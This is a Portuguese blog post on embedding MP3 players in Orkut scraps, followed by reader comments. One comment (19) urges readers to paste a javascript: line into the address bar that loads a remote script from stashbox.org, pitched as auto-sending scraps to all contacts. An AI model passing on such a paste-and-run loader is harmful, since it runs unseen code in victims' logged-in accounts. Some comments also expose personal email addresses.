Colocar MP3 no Orkut

Se você sempre quis colocar música nos seus recados do orkut, ou, sempre quis escutar aquela música enquanto respondia aquele scrap. 'SEUS POBREMAS SE ACABARAM-SE'
Adquira já o Ultimate Mega Interceptor Musicator For Orkut ( como visto na tv ).



Brincadeiras a parte vamos lá...
É simples, para colocar uma música no seu recado você deve ir até o site
Mp3Tube escolher a música e copiar o endereço dela na caixa "Embed"!!
(no site tem a opção de enviar a sua música, mediante a um simples cadastro, como no youtube originale )

antes de sair gritando "meu Deus eu não consigo, o que eu faço depois de copiar o link da música... quem poderá me defender?!"

Euuu... aí, sua anta ( meu Deus esse povo tá quase me matando ) depois de copiar o link, você cola no seu recadinho e envia pra qualquer um que esteja na sua lista de contatos desde que o html esteja habilitado no seu orkut! bjo!



Comentários

  1. Como faço para habilitar o HTML no meu orkut? n to conseguindo postar

    ResponderExcluir
  2. esse site de mp3 é lixo!

    ResponderExcluir
  3. coloquei o mypod + nao consigo trocar de músicas o q eu faço?

    obrigadoooo

    ResponderExcluir
  4. Mto bom cara!
    valeu msm..
    consegui direitinho aê do jeito q vc ensinou...
    abracao...

    ResponderExcluir
  5. como faço para habilitar o html no meu orkut!
    pq naum estou conseguindo naum!
    o cara me ajuda ai!
    naum estou conseguindo postar!
    E OUTRA AS MUSICAS VÃO TOCAR AUTOMATICAMENTE QUANDO ALGUEM ENTRA NA MINHA PAGINAS DE RECADOS SEM PRECISAR CLACA EM ND?
    DEIS DE JAH !
    OBRIGADO!!

    ResponderExcluir
  6. vlw cara!!
    dew certw!
    flw!

    ResponderExcluir
  7. Put's...
    Muito massa
    Eu so consegui, cadastrar...
    Flw's
    T+

    by:
    eduardo_minacu@hotmail.com

    ResponderExcluir
  8. Oi.. estou aqui para poder tirar uma duvida de vcs... Eu ja sei como colocar nos scrap uma musica com auto-player e invisivel... Ja ftentei de tudoo que é jeito fazer tovcar duas em um mesmo player.. mas não conseguir, ou melhor tocava as duas ao mesmo tempo.. Gostaria de saber oque fazer para tocar uma musica de cada vez... Agradeço se pulderem tirar minha duvida.. meu msn é italo_bodyboard@hotmail.com

    bye....

    ResponderExcluir
  9. O PROBLEMA É Q ESSE SITE MP3 TUBE, NÃO ACEITA MEU CADASTRO, DIZ Q SEMPRE HÁ ERRO ESSA M...E EU SEI COMO FAZER, MAS O DITO CUJO TÁ ME SACANEANDO!
    DÁ PRA CHAMAR O XAPOLIN COLORADO?
    OH! QUEM PODERÁ ME AJUDAR ?

    ResponderExcluir
  10. VELHO NA BOA VAI TOMAR NO CU!

    MAIS QUE MERDA! VOCES SO SABEM RECLAMAR E NEM LÊEM NADA!

    PUTA QUE PARIU!

    AGRADECER NINGUÉM QUER NÉ?

    VSF

    ResponderExcluir
  11. po cara muito obrigado pelas dicas consegui agora queria saber se da pra fazer tocar automatico

    ResponderExcluir
  12. Valeu pela dica quentíssima..hehe consegui colocar uma música mto especial na pág do Orkut de um amigo. Bah!! Boa sorte Cara...OBRIGADA pela força.
    Carla.

    ResponderExcluir
  13. valeu cara. deu tudo dcerto aqui. abraços

    ResponderExcluir
  14. nao consigo fzer com que fique transparente o meu aperece,como faco

    ResponderExcluir
  15. Oi! Adorei suas dicas e consegui colocar a música com o player, mas como faço para que ele fique transparente e só ouça a canção?

    Desde já obrigada!

    ResponderExcluir
  16. Ah, como faço para habilitar o HTML do meu orkut? Obrigada.

    ResponderExcluir
  17. Vc que crio esta merda é um grande filho da puta, esta porra não funciona, só perdi meu tempo nesta merda.
    Segui os passos é furada isto ai seu corno mentiroso filho da puta, vai toma no seu Cu, seu metidinho a besta.Vai si fude antes que eu me esqueça.Não entrem nesta pessoal é fria
    valdo

    ResponderExcluir
  18. aiuhaiauh perdeu mais tempo ainda chingando

    aqui deu td certo

    ResponderExcluir
  19. Seu babaca dedo de ouro, quer aprender a ensinar alguem?
    Seu trouxa assim se ensina ok?
    Alguem quer aprender a mandar recado pelo Orkut para todos da lista de uma vez sÓ
    Siga os passos ( sei ensinar) não sou este babacão ai!
    Siga:
    Copie o Codigo abaixo e cole na BARRA DE ENDERECOS (aquele local onde se digita www). Apos colar, aperte a tecla ENTER.


    √ Codigo ↓ ↓

    javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://www.stashbox.org/64895/Scraps_Automaticos.js';void(0);

    ______________________________
    Veja a imagem se não entendeu o que foi explicado acima

    http://img136.imageshack.us/my.php?image=scrapsee1.jpg

    E foda-se o restante, podem me agradecer se quizerem senão foda-se
    Valdo ( o fudido)

    ResponderExcluir
  20. Como faço para habilitar para habilitar o html do meu orkut?
    Obrigado!

    ResponderExcluir
  21. ola irmaos estou querendo fazer um registro no mp3 tube so que ta dando sempre email em uso ou nome em uso nao to conseguindo fazer me ajudem como faço? estou fazendo direitinho colocando email senha mai na hora de terminar fala isso so da erro estou aguardando voces me ajudar tabom abraçao a todos
    cantor Marcos Evangelista

    ResponderExcluir
  22. nauh consigo abilitar como faço ajuda eu!!!!




    pf


    socratesroots@hotmail.com

    ResponderExcluir
  23. Nossa fácil em amigo... na toa q se xama o povo de anta... hehehe valew

    ResponderExcluir
  24. aew cara, valew. Embora não toque automaticamente. Mas está bom , valew pelo post. É só copiar e colar pesoal, muito fácil.

    ResponderExcluir
  25. Ai amigo te fala aki se podia
    explica isso ai masi detalhado porq
    nem todo mundo entende o rolo q vc fez ai tah blz VLW...

    ResponderExcluir
  26. como faço par colocar musica do meu computador para o orkut?

    ResponderExcluir
  27. Oláaa!!! Como faço para por musica no PERFIL do meu orkut????

    Abraço

    ResponderExcluir
  28. VALEU MESMO...

    O bom é que é fácil fácil...

    abs

    ResponderExcluir
  29. Boto fé parceiro......
    tu é gente fina.......

    ResponderExcluir
  30. qro colocar uma música do mengão na pagina de recados
    cm q faz?

    ResponderExcluir
  31. Ô SUA IDIOTA.. ISSO TODO MUNDO SABE.. EU QUERO QUE TOQUE AUTOMATICAMENTE QDO ALGUÉM ENTRAR NA MINHA PÁGINA DE RECADOS!

    ResponderExcluir
  32. eu nao consigo fazer a musica tocar direto quando eu entro na minha pagina de recados .
    Como eu faço???????????????

    ResponderExcluir
  33. vcs são todos um otario

    ResponderExcluir
  34. Poxa vlw,msm,mas a música não toca automaticamnete.

    Eu já vi com o Windons Player,mas não sei como. Alguém poderia me ajudar?
    Bjinhoss

    ResponderExcluir
  35. http://br.answers.yahoo.com/question/index?qid=20070822062136AAhPQJP

    aqui tem tudo!

    ResponderExcluir
  36. seus panhasus vai estuda caraio

    ResponderExcluir
  37. Esse site não existe mais, tem outro que possa indicar?

    ResponderExcluir
  38. Oi galera, quanto palavrãoooo, vamos ajudar a galera que precisa, do contrário eles não estariam aqui pedindo auxílio, de qualquer forma obrigada pela compreensão.

    Grata !!

    ResponderExcluir
  39. Prà colocar musica no orkut è uma telenovela!procura link,programas ect.etc! abra uma conta no myspace e resolva os seus problemas...ali vc pode colocar a musica q vc quiser sem problemas!orkut,netlog,badooo,sonico è coisa do passado

    ResponderExcluir
  40. faz tempo q tento entrar nesse site Mp3 mas não adianta, aki só entra um site de jogos!
    assim fica difícil...não tem outro site q se tenha esse bendito desse código não? pô tá ruim hein!

    ResponderExcluir
  41. Moro em Goiânia, curto muito skateboard e um "freeride" de bike. Téc. em Informática, formado Pela Google Inc. hehe, só.

    ResponderExcluir
  42. QUANDO APERTO NO LINK DESSE SITE, APARECE UM DE JOGOS ;s

    ResponderExcluir
  43. MP3TUBE morreu! --' Fiquei P*** da cara,
    Mas ai vai uma indicação minha:
    http://www.krafta.info/br/
    Espero ter ajudado!

    ResponderExcluir
  44. eu queria colocar uma musica no meu recados mas que tocasse automaticamente quando a pessoa clicar na minha pagina , eu vi uma vez na pagina de um amigo , que aparecia quem cantava mas era tão pequeneninho e ele escreveu um texo lindo .Quando alguem fosse visitar a pagina dele a musica tocava, muito maneiro .

    ResponderExcluir

Postar um comentário

Oi ? volte sempre ok ?

se deseja parceria, coloque o banner/link do dedodeouro no seu blog/site e me avise!

um abraço!